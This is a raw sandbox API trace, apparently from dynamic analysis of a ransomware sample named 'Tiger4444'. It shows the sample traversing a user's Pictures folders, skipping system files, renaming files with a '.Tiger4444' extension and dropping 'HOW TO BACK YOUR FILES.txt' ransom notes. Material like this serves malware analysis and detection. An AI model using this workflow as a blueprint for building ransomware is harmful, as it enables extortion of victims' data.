GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=13228) returned 1 [0045.735] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0045.735] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0045.735] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x36b0, lpName=0x0) returned 0x2c8 [0045.735] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x36b0) returned 0xbe0000 [0045.736] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.736] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.736] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.736] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.736] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.736] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.736] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.736] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.736] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13718934982) returned 1 [0045.736] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0045.736] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0045.736] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.737] CloseHandle (hObject=0x2c8) returned 1 [0045.737] CloseHandle (hObject=0x260) returned 1 [0045.738] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\zkGa22a5xC9Cll9U.gif.Tiger4444") returned 55 [0045.738] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\zkGa22a5xC9Cll9U.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\zkga22a5xc9cll9u.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\zkGa22a5xC9Cll9U.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\zkga22a5xc9cll9u.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.738] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=13232 | out: Addend=0xc6f980) returned 18533792 [0045.738] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4535 [0045.738] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d36d400, ftCreationTime.dwHighDateTime=0x1d4ce14, ftLastAccessTime.dwLowDateTime=0x8329a390, ftLastAccessTime.dwHighDateTime=0x1d4d2fd, ftLastWriteTime.dwLowDateTime=0x8329a390, ftLastWriteTime.dwHighDateTime=0x1d4d2fd, nFileSizeHigh=0x0, nFileSizeLow=0x2052, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_gki25reI.bmp", cAlternateFileName="_GKI25~1.BMP")) returned 1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2="Tiger4444.exe") returned -1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2=".") returned 1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2="..") returned 1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2="windows") returned -1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2="bootmgr") returned -1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2="pagefile.sys") returned -1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2="boot") returned -1 [0045.738] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2="ids.txt") returned -1 [0045.739] lstrcmpiW (lpString1="_gki25reI.bmp", lpString2="NTUSER.DAT") returned -1 [0045.739] lstrcpyW (in: lpString1=0x30aeada, lpString2="_gki25reI.bmp" | out: lpString1="_gki25reI.bmp") returned="_gki25reI.bmp" [0045.739] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\_gki25reI.bmp", dwFileAttributes=0x0) returned 1 [0045.739] lstrlenW (lpString="_gki25reI.bmp") returned 13 [0045.739] lstrlenW (lpString="Tiger4444") returned 9 [0045.739] lstrcmpiW (lpString1="25reI.bmp", lpString2="Tiger4444") returned -1 [0045.739] lstrlenW (lpString=".dll") returned 4 [0045.739] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0045.739] lstrlenW (lpString=".lnk") returned 4 [0045.739] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0045.739] lstrlenW (lpString=".ini") returned 4 [0045.739] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0045.739] lstrlenW (lpString=".sys") returned 4 [0045.739] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0045.739] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\_gki25reI.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\_gki25rei.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.739] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.739] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13719229602) returned 1 [0045.739] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=8274) returned 1 [0045.739] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0045.739] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0045.739] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2360, lpName=0x0) returned 0x2c8 [0045.739] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2360) returned 0xbe0000 [0045.740] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.740] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.740] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.740] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.740] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.740] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.740] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.740] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.740] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13719336875) returned 1 [0045.740] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0045.740] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0045.740] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.741] CloseHandle (hObject=0x2c8) returned 1 [0045.741] CloseHandle (hObject=0x260) returned 1 [0045.742] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\_gki25reI.bmp.Tiger4444") returned 48 [0045.742] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\_gki25reI.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\_gki25rei.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\_gki25reI.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\_gki25rei.bmp.tiger4444"), dwFlags=0x1) returned 1 [0045.742] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=8288 | out: Addend=0xc6f980) returned 18547024 [0045.742] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4536 [0045.742] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d36d400, ftCreationTime.dwHighDateTime=0x1d4ce14, ftLastAccessTime.dwLowDateTime=0x8329a390, ftLastAccessTime.dwHighDateTime=0x1d4d2fd, ftLastWriteTime.dwLowDateTime=0x8329a390, ftLastWriteTime.dwHighDateTime=0x1d4d2fd, nFileSizeHigh=0x0, nFileSizeLow=0x2052, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_gki25reI.bmp", cAlternateFileName="_GKI25~1.BMP")) returned 0 [0045.742] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0045.742] lstrcpyW (in: lpString1=0x30aeada, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.742] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\pictures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.742] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.743] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.744] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.744] CloseHandle (hObject=0x260) returned 1 [0045.744] CloseHandle (hObject=0x2ac) returned 1 [0045.744] GetCurrentThreadId () returned 0xfa8 [0045.744] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc663a8 [0045.745] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0045.745] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0045.745] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663a0 | out: hHeap=0xc50000) returned 1 [0045.745] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0045.745] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\" [0045.745] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\.BFC0E91B00AE8A0620D3" [0045.745] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.746] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.752] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.753] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.754] CloseHandle (hObject=0x2ac) returned 1 [0045.754] lstrlenW (lpString="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned 39 [0045.754] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.754] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x804a2d81, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0045.754] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.754] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.754] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.755] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.755] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x804a2d81, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.755] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.755] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.755] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.755] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.755] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.755] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x804a2d81, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x804a2d81, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x804a2d81, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.755] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.755] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.755] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0045.755] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0045.755] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.755] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini", dwFileAttributes=0x2) returned 1 [0045.755] lstrlenW (lpString="desktop.ini") returned 11 [0045.755] lstrlenW (lpString="Tiger4444") returned 9 [0045.755] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0045.755] lstrlenW (lpString=".dll") returned 4 [0045.756] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0045.756] lstrlenW (lpString=".lnk") returned 4 [0045.756] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0045.756] lstrlenW (lpString=".ini") returned 4 [0045.756] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0045.756] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.756] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0045.756] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.756] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.757] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.757] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.758] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.758] CloseHandle (hObject=0x260) returned 1 [0045.758] CloseHandle (hObject=0x2ac) returned 1 [0045.758] GetCurrentThreadId () returned 0xfa8 [0045.758] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc5a728 [0045.759] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0045.759] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0045.759] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5a720 | out: hHeap=0xc50000) returned 1 [0045.759] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0045.759] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\" [0045.759] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\.BFC0E91B00AE8A0620D3" [0045.759] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.760] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.762] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.763] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.763] CloseHandle (hObject=0x2ac) returned 1 [0045.764] lstrlenW (lpString="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned 36 [0045.764] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.764] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x804a2d81, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0045.764] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.764] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.764] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.764] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.764] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x804a2d81, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.764] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.764] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.764] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.764] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.764] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.764] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x804a2d81, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x804a2d81, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x804c901c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.764] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.764] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.764] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0045.764] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0045.765] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0045.765] lstrcpyW (in: lpString1=0x30aeaf2, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.765] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini", dwFileAttributes=0x2) returned 1 [0045.765] lstrlenW (lpString="desktop.ini") returned 11 [0045.765] lstrlenW (lpString="Tiger4444") returned 9 [0045.765] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0045.765] lstrlenW (lpString=".dll") returned 4 [0045.765] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0045.765] lstrlenW 